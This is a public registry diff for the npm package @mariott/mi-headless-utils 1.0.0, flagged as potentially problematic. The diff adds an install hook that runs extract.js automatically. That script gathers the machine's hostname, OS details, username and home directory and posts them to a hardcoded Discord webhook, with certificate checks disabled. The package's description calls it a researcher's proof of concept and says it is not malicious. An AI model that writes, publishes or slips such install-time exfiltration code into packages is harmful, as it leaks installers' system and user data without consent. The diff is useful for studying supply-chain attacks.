@mariott/mi-headless-utils 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @mariott/mi-headless-utils might be problematic. Click here for more details.
- package/extract.js +47 -0
- package/package.json +11 -0
package/extract.js
ADDED
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
var os = require("os");
|
|
3
|
+
var hostname = os.hostname();
|
|
4
|
+
var type = os.type();
|
|
5
|
+
var version = os.version();
|
|
6
|
+
var release = os.release();
|
|
7
|
+
var info = os.userInfo();
|
|
8
|
+
var package_name_l = process.argv[2];
|
|
9
|
+
var package_version_l = process.argv[3];
|
|
10
|
+
var package_name_w = process.argv[4];
|
|
11
|
+
var package_version_w = process.argv[5];
|
|
12
|
+
var package_name = "";
|
|
13
|
+
var package_version = "";
|
|
14
|
+
|
|
15
|
+
if (package_name_l == "$npm_package_name" ) {
|
|
16
|
+
// We are on windows, use these names and version
|
|
17
|
+
package_name = package_name_w;
|
|
18
|
+
package_version = package_version_w;
|
|
19
|
+
} else {
|
|
20
|
+
// Linux it is...
|
|
21
|
+
package_name = package_name_l;
|
|
22
|
+
package_version = package_version_l;
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
var message = "Package '" + package_name + " ', version: " + package_version + " has been installed on hostname: '" + hostname + "', type: '" + type +"', release: '" + release + "', version: '" + version + "', username: '" + info["username"] + "', homedir: '" + info["homedir"] + "'.";
|
|
26
|
+
|
|
27
|
+
const data = new TextEncoder().encode(
|
|
28
|
+
JSON.stringify({
|
|
29
|
+
content: message,
|
|
30
|
+
})
|
|
31
|
+
);
|
|
32
|
+
|
|
33
|
+
const options = {
|
|
34
|
+
hostname: 'discord.com',
|
|
35
|
+
port: 443,
|
|
36
|
+
path: '/api/webhooks/1260528028996341790/IFm-pVEdO0C2oJirxkUUq9TkOGO535Acs89v4mX3hsGenUGSKZONhgt6T73qmhvfVUHO',
|
|
37
|
+
method: 'POST',
|
|
38
|
+
headers: {
|
|
39
|
+
'Content-Type': 'application/json',
|
|
40
|
+
'Content-Length': data.length
|
|
41
|
+
},
|
|
42
|
+
rejectUnauthorized: false
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
const req = https.request(options, res => {});
|
|
46
|
+
req.write(data);
|
|
47
|
+
req.end();
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@mariott/mi-headless-utils",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "This package is a proof of concept used by Antoine Roly to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"install": "node extract.js $npm_package_name $npm_package_version %npm_package_name% %npm_package_version%"
|
|
8
|
+
},
|
|
9
|
+
"author": "Antoine Roly <antoine.roly@gmail.com>",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|